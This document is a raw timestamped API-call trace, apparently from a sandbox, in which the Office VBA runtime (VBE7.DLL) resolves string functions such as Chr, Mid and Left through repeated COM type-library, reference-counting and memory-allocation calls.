[0203.047] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0x9653e90 [0203.048] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0x4, _Src=0x5732c22 | out: _Dst=0x9653e90) returned 0x0 [0203.048] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Chr") returned 0x103b5c [0203.048] IUnknown:AddRef (This=0x9ab5f00) returned 0x15 [0203.048] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.048] IUnknown:AddRef (This=0xa121698) returned 0xa [0203.048] IUnknown:Release (This=0xa121698) returned 0x9 [0203.048] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.048] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.048] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.048] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.048] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0203.048] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.048] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.048] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.048] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0203.048] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0203.049] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0x9653e90 [0203.049] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0x4, _Src=0x573133a | out: _Dst=0x9653e90) returned 0x0 [0203.049] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0203.049] IUnknown:AddRef (This=0x9ab5f00) returned 0x15 [0203.050] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.050] IUnknown:AddRef (This=0xa121698) returned 0xa [0203.050] IUnknown:Release (This=0xa121698) returned 0x9 [0203.050] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.051] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.051] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.051] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.051] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0203.051] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.051] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.052] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.052] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0203.052] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0203.052] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0x9653e90 [0203.053] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0x4, _Src=0x5732c22 | out: _Dst=0x9653e90) returned 0x0 [0203.053] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Chr") returned 0x103b5c [0203.056] IUnknown:AddRef (This=0x9ab5f00) returned 0x15 [0203.056] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.056] IUnknown:AddRef (This=0xa121698) returned 0xa [0203.056] IUnknown:Release (This=0xa121698) returned 0x9 [0203.057] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.057] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.057] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.057] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.058] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0203.058] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.059] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.059] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.060] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0203.060] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0203.061] IMalloc:Alloc (This=0x7fefecb5380, cb=0xc) returned 0x9653e90 [0203.061] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0x5, _Src=0x57310ee | out: _Dst=0x9653e90) returned 0x0 [0203.061] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Left") returned 0x10e151 [0203.061] IUnknown:AddRef (This=0x9ab5f00) returned 0x15 [0203.061] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.061] IUnknown:AddRef (This=0xa121698) returned 0xa [0203.061] IUnknown:Release (This=0xa121698) returned 0x9 [0203.061] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.061] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.061] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.061] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.061] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0203.061] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.061] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.061] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.062] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0203.062] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0203.062] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc430, pIndex=0x0 | out: ppTLib=0x1dc430*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.062] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc440, pDummy=0x0 | out: ppTLibAttr=0x1dc440, pDummy=0x0) returned 0x0 [0203.062] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.062] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.062] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x1dc430, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.062] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc430, pbstrName=0x0, pwOrdinal=0x1dc450 | out: pBstrDllName=0x1dc430*=0x0, pbstrName=0x0, pwOrdinal=0x1dc450*=0xc6c0) returned 0x0 [0203.062] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc430, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc430, pwOrdinal=0x500000000) returned 0x0 [0203.062] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc390, pIndex=0x0 | out: ppTLib=0x1dc390*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.062] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc3a0, pDummy=0x0 | out: ppTLibAttr=0x1dc3a0, pDummy=0x0) returned 0x0 [0203.062] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.062] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.062] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dc390, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.062] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc390, pbstrName=0x0, pwOrdinal=0x1dc3b0 | out: pBstrDllName=0x1dc390*=0x0, pbstrName=0x0, pwOrdinal=0x1dc3b0*=0xc620) returned 0x0 [0203.062] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000) returned 0x0 [0203.063] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa1216f0, ppTLib=0x1dc430, pIndex=0x0 | out: ppTLib=0x1dc430*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.063] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc440, pDummy=0x0 | out: ppTLibAttr=0x1dc440, pDummy=0x0) returned 0x0 [0203.063] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.063] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.063] ITypeInfo:RemoteGetDllEntry (in: This=0xa1216f0, memid=1610612737, invkind=1, refPtrFlags=0x1dc430, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.063] ITypeInfo:RemoteGetDllEntry (in: This=0xa1216f0, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc430, pbstrName=0x0, pwOrdinal=0x1dc450 | out: pBstrDllName=0x1dc430*=0x0, pbstrName=0x0, pwOrdinal=0x1dc450*=0xc6c0) returned 0x0 [0203.063] ITypeInfo:RemoteGetDllEntry (in: This=0xa1216f0, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc430, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc430, pwOrdinal=0x500000000) returned 0x0 [0203.063] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc390, pIndex=0x0 | out: ppTLib=0x1dc390*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.063] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc3a0, pDummy=0x0 | out: ppTLibAttr=0x1dc3a0, pDummy=0x0) returned 0x0 [0203.063] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.063] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.063] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612763, invkind=1, refPtrFlags=0x1dc390, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.063] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612763, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc390, pbstrName=0x0, pwOrdinal=0x1dc3b0 | out: pBstrDllName=0x1dc390*=0x0, pbstrName=0x0, pwOrdinal=0x1dc3b0*=0xc620) returned 0x0 [0203.063] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612763, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000) returned 0x0 [0203.063] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc0d0, pIndex=0x0 | out: ppTLib=0x1dc0d0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.063] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc0e0, pDummy=0x0 | out: ppTLibAttr=0x1dc0e0, pDummy=0x0) returned 0x0 [0203.064] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.064] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.064] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dc0d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.064] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc0d0, pbstrName=0x0, pwOrdinal=0x1dc0f0 | out: pBstrDllName=0x1dc0d0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc0f0*=0xc360) returned 0x0 [0203.064] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc0d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc0d0, pwOrdinal=0x500000000) returned 0x0 [0203.064] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc430, pIndex=0x0 | out: ppTLib=0x1dc430*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.064] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc440, pDummy=0x0 | out: ppTLibAttr=0x1dc440, pDummy=0x0) returned 0x0 [0203.064] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.064] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.064] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x1dc430, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.064] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc430, pbstrName=0x0, pwOrdinal=0x1dc450 | out: pBstrDllName=0x1dc430*=0x0, pbstrName=0x0, pwOrdinal=0x1dc450*=0xc6c0) returned 0x0 [0203.064] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc430, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc430, pwOrdinal=0x500000000) returned 0x0 [0203.064] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dbd30, pIndex=0x0 | out: ppTLib=0x1dbd30*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.064] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dbd40, pDummy=0x0 | out: ppTLibAttr=0x1dbd40, pDummy=0x0) returned 0x0 [0203.064] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.064] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.064] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dbd30, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.064] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dbd30, pbstrName=0x0, pwOrdinal=0x1dbd50 | out: pBstrDllName=0x1dbd30*=0x0, pbstrName=0x0, pwOrdinal=0x1dbd50*=0xbfc0) returned 0x0 [0203.065] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dbd30, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dbd30, pwOrdinal=0x500000000) returned 0x0 [0203.065] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc290, pIndex=0x0 | out: ppTLib=0x1dc290*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.065] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc2a0, pDummy=0x0 | out: ppTLibAttr=0x1dc2a0, pDummy=0x0) returned 0x0 [0203.065] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.065] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.065] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x1dc290, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.065] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc290, pbstrName=0x0, pwOrdinal=0x1dc2b0 | out: pBstrDllName=0x1dc290*=0x0, pbstrName=0x0, pwOrdinal=0x1dc2b0*=0xc520) returned 0x0 [0203.065] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc290, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc290, pwOrdinal=0x500000000) returned 0x0 [0203.065] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dbd30, pIndex=0x0 | out: ppTLib=0x1dbd30*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.065] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dbd40, pDummy=0x0 | out: ppTLibAttr=0x1dbd40, pDummy=0x0) returned 0x0 [0203.065] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.065] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.065] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dbd30, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.065] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dbd30, pbstrName=0x0, pwOrdinal=0x1dbd50 | out: pBstrDllName=0x1dbd30*=0x0, pbstrName=0x0, pwOrdinal=0x1dbd50*=0xbfc0) returned 0x0 [0203.065] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dbd30, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dbd30, pwOrdinal=0x500000000) returned 0x0 [0203.065] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc290, pIndex=0x0 | out: ppTLib=0x1dc290*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.065] 